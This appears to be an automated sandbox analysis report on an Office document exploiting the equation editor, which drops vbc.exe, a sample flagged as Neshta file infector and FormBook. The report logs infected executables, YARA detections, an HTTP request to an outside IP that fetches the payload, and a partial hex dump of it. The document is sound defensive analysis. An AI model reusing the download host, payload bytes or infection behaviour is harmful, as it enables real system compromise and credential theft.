Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe	Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Joe Sandbox ML: detected
Source: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXE	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe	Joe Sandbox ML: detected

Source: 5.0.vbc.exe.400000.11.unpack	Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.5.unpack	Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.9.unpack	Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.17.unpack	Avira: Label: W32/Delf.I
Source: 5.2.vbc.exe.400000.1.unpack	Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.19.unpack	Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.13.unpack	Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.7.unpack	Avira: Label: W32/Delf.I
Source: 5.0.vbc.exe.400000.15.unpack	Avira: Label: W32/Delf.I

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Spreading:

Yara detected Neshta

Show sources

Source: Yara match	File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.630461383.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Infects executable files (exe, dll, sys, html)

Show sources

Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\setup.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Package Cache\{e2803110-78b3-4664-a479-3611a381656a}\VC_redist.x86.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\elevation_service.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateCore.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.EXE	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Common Files\microsoft shared\TextConv\WksConv\Wkconv.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\uninstall\helper.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\Install\{FCE087CB-E39B-4153-8CDB-9F0ACA90F73B}\GoogleUpdateSetup.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\wow_helper.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\java.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\WinDirStat\windirstat.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\Installer\chrmstp.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleCrashHandler64.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\WinDirStat\Uninstall.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\javaws.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\notification_helper.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdate.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateOnDemand.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Oracle\Java\javapath_target_415196\javaw.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Package Cache\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\VC_redist.x64.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.102\GoogleUpdateSetup.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.135\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\maintenanceservice_installer.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateBroker.exe	Jump to behavior
Source: C:\Users\Public\vbc.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.102\GoogleUpdateSetup.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00405080 FindFirstFileA,FindNextFileA,FindClose,	5_2_00405080
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00405634 FindFirstFileA,FindNextFileA,FindClose,	5_2_00405634
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00404F6C FindFirstFileA,FindClose,	5_2_00404F6C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004056A7 FindFirstFileA,FindNextFileA,FindClose,	5_2_004056A7

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00406D40 GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,

5_2_00406D40

Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\1033\	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\BIN\	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Common Files\Microsoft Shared\Web Folders\	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Common Files\Microsoft Shared\Web Folders\1033\	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\	Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\14\	Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.12.91.205:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.12.91.205:80

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 25 Nov 2021 18:05:27 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11Last-Modified: Thu, 25 Nov 2021 03:22:49 GMTETag: "b7200-5d1947d38df57"Accept-Ranges: bytesContent-Length: 750080Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 89 01 9f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 66 0b 00 00 0a 00 00 00 00 00 00 72 85 0b 00 00 20 00 00 00 a0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 20 85 0b 00 4f 00 00 00 00 a0 0b 00 70 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 65 0b 00 00 20 00 00 00 66 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 70 06 00 00 00 a0 0b 00 00 08 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0b 00 00 02 00 00 00 70 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 85 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 ac 48 01 00 54 21 01 00 03 00 00 00 8c 01 00 06 00 6a 02 00 20 1b 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 be 02 73 1f 00 00 0a 7d 01 00 00 04 02 73 20 00 00 0a 7d 06 00 00 04 02 28 21 00 00 0a 02 28 14 00 00 06 02 7b 0d 00 00 04 17 6f 22 00 00 0a 2a 1b 30 03 00 ac 00 00 00 01 00 00 11 02 28 03 00 00 06 02 03 7d 03 00 00 04 03 2d 09 02 14 7d 02 00 00 04 2b 54 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 24 00 00 0a 2c 19 02 02 7b 01 00 00 04 03 6f 23 00 00 0a 6f 25 00 00 0a 7d 02 00 00 04 2b 28 02 73 26 00 00 0a 7d 02 00 00 04 02 7b 01 00 00 04 03 6f 23 00 00 0a 02 7b 02 00 00 04 6f 27 00 00 0a 02 28 07 00 00 06 02 7b 02 00 00 04 2c 36 02 7b 02 00 00 04 6f 28 00 00 0a 0a 2b 0f 12 00 28 29 00 00 0a 0b 02 07 28 10 00 00 06 12 00 28 2a 00 00 0a 2d e8 de 0e 12 00 fe 16 11 00 00 1b 6f 12 00 00 0a dc 2a 01 10 00 00 02 00 81 00 1c 9d 00 0e 00 00 00 00 8e 02 7b 06 00 00 04 6f 2b 00 00 0a 02 7b 09 00 00 04 6f 2c 00 00 0a 6f 2d 00 00 0a 02 14 7d 03 00 00 04 2a 13 30 03 00 29 00 00 00 02 00 00 1

Source: global traffic

HTTP traffic detected: GET /50005/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.91.205Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205
Source: unknown	TCP traffic detected without corresponding DNS query: 198.12.91.205

Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5AE55544.emf

Jump to behavior

Source: global traffic

Source: vbc.exe, 00000005.00000003.502748576.00000000009A0000.00000004.00000001.sdmp

Binary or memory string: _WinAPI_RegisterRawInputDevices.au3

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.472955830.000000000394E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.473024128.00000000039A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: 5.0.vbc.exe.400000.15.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.17.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.0.vbc.exe.400000.11.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
